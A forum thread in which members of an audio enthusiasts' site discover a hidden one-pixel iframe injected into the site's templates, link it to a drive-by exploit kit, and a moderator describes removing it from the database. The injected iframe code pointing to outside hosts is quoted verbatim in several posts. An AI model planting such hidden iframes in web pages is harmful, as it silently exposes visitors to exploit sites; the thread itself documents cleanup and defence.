Page 1 of 2 12 LastLast
Results 1 to 15 of 20

Thread: What is best-videogames.com?

  1. #1
    Senior Member
    Join Date
    Oct 2003
    Location
    Texas
    Posts
    1,863

    What is best-videogames.com?

    This url is embedded in the source code of this site, and it's slowing the page load.


    http://best-videogames.com/forum/ind.php

    Line 58.

    </head>


    <body>







    <divclass="above_body"> <!-- closing tag is in template navbar -->



    <divstyle="display:none"><iframesrc="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>



    <divid="header" class="floatcontainer doc_header">







    <div><aname="top" href="index.php" class="logo-image"><imgsrc="images/LH-logo.gif" alt="Lansing Heritage Forums - Powered by vBulletin" /></a></div>



    <divid="toplinks" class="toplinks">

  2. #2
    Senior Member Don C's Avatar
    Join Date
    Apr 2003
    Location
    Santa Rosa CA
    Posts
    1,722
    I noticed it too. A quick google informs us that the vbulletin code here has been hijacked and modified to generate page views for some jerk scammer. I don't think that it has anything do do with our computers at this point, just the server that runs the forum software.

  3. #3
    Senior Member 1audiohack's Avatar
    Join Date
    Jul 2007
    Location
    Las Vegas Nevada
    Posts
    3,092
    What ever it is can it be removed? It makes browsing this site on the old iPhone almost intolerable.
    If we knew what the hell we were doing, we wouldn't call it research would we.

  4. #4
    Moderator hjames's Avatar
    Join Date
    Nov 2005
    Location
    NoVA - DC 'burbs
    Posts
    8,547
    Quote Originally Posted by 1audiohack View Post
    What ever it is can it be removed? It makes browsing this site on the old iPhone almost intolerable.
    Sure - its just code - Seems to be a dynamic site, so the bad code can be removed without much grief ...
    once the webmaster finds the free time to poke into the code and remove it.

    The bigger questions is - what do they need to do to harden the site so it doesn't happen again. Kiddie hackers (amateurs) leave foot prints like that - serious hackers load vulnerabilities and don't leave signposts to let you know you've been compromised.
    2ch: WiiM Pro; Topping E30 II DAC; Oppo, Acurus RL-11, Acurus A200, JBL Dynamics Project - Offline: L212-TwinStack, VonSchweikert VR-4
    7: TIVO, Oppo BDP103D, B&K, 2pr UREI 809A, TF600, JBL B460

  5. #5
    Senior Member
    Join Date
    Apr 2003
    Location
    GTA, Ont.
    Posts
    5,109
    "nbadimensions.net/sti.ph" is also loading along with (or piggybacking after ) the regular url loads, www.audioheritage.org/vbulletin > according to my task bar .


  6. #6
    Senior Member
    Join Date
    Apr 2003
    Location
    GTA, Ont.
    Posts
    5,109
    According to my research; the "Best-Videogames.com" is a wrapper of sorts that's run by > "Exploit Blackhole Exploit Kit(type 2065)" on this site .

    It seems that browsers running AVG are being warned ( AGAINST ACCESSING THIS SITE ) since this web-site ( LHF ) is still infected .

    <>

  7. #7
    Senior Member
    Join Date
    Apr 2003
    Location
    GTA, Ont.
    Posts
    5,109

    Here's what's loading !

    Here is what is being loaded according to my browser ( in order , I believe ) .

    Attached Images Attached Images    

  8. #8
    Administrator Mr. Widget's Avatar
    Join Date
    Apr 2003
    Location
    San Francisco
    Posts
    9,720
    Funny... I saw the title of the thread and thought it was one more topic I have no interest in, being an avid non-gamer since the dawn of video games.

    I'll send a note to Ann and John who take care of our hosting and see if they have the time to deal with it.

    Thanks Earl for shooting the note to the moderators.


    Widget

  9. #9
    Webmaster Don McRitchie's Avatar
    Join Date
    Apr 2003
    Location
    Winnipeg, Canada
    Posts
    1,753
    Hopefully John or Ann can weigh in on this shortly. There is a more recent version of the forum software that I can update to, but I don't want to do this before knowing whether this would overwrite the infection. Otherwise, it could make matters worse.
    Regards

    Don McRitchie

  10. #10
    Senior Member
    Join Date
    Oct 2003
    Location
    Texas
    Posts
    1,863
    Quote Originally Posted by Mr. Widget View Post
    Funny... I saw the title of the thread and thought it was one more topic I have no interest in, being an avid non-gamer since the dawn of video games.

    I'll send a note to Ann and John who take care of our hosting and see if they have the time to deal with it.

    Thanks Earl for shooting the note to the moderators.


    Widget
    I have no interest in video games, and it would have never occured to me to inquire about video games in the "Forum Feedback" forum of this site.

    Had I known the moderators didn't actually read this forum, I wouldn't have bothered posting it in the first place.

  11. #11
    Administrator Mr. Widget's Avatar
    Join Date
    Apr 2003
    Location
    San Francisco
    Posts
    9,720
    Quote Originally Posted by JeffW View Post
    I have no interest in video games, and it would have never occured to me to inquire about video games in the "Forum Feedback" forum of this site.

    Had I known the moderators didn't actually read this forum, I wouldn't have bothered posting it in the first place.
    Ouch!

    Others probably did read it, but a different title would have likely captured my attention. I for one simply don't have the time to read every thread... much less every post.

    As it turned out, a click on the "Report Post" button is what called my attention to it. In any event, thanks for bringing it to our attention.


    Widget
    Attached Images Attached Images  

  12. #12
    Super Moderator cantelow's Avatar
    Join Date
    Nov 2003
    Location
    Colorado
    Posts
    17

    Heavens!

    Thanks for the head's up. I'll try to get rid of that today!

    Best,
    Ann

  13. #13
    Super Moderator cantelow's Avatar
    Join Date
    Nov 2003
    Location
    Colorado
    Posts
    17

    Fixed for now

    That was an interesting problem. Thanks, everyone for the info.

    I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:

    Code:
      <div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>
    
      <div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>
    to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

    I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

    Happily, clearing the malicious links in just these 2 template records clears them out of the whole site.

    Ann

  14. #14
    Senior Member
    Join Date
    Oct 2003
    Location
    Texas
    Posts
    1,863
    Thanks, I can tell a difference already.

  15. #15
    Senior Member
    Join Date
    Apr 2003
    Location
    GTA, Ont.
    Posts
    5,109
    Thanks Ann

    This site loads cleanly now .


Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •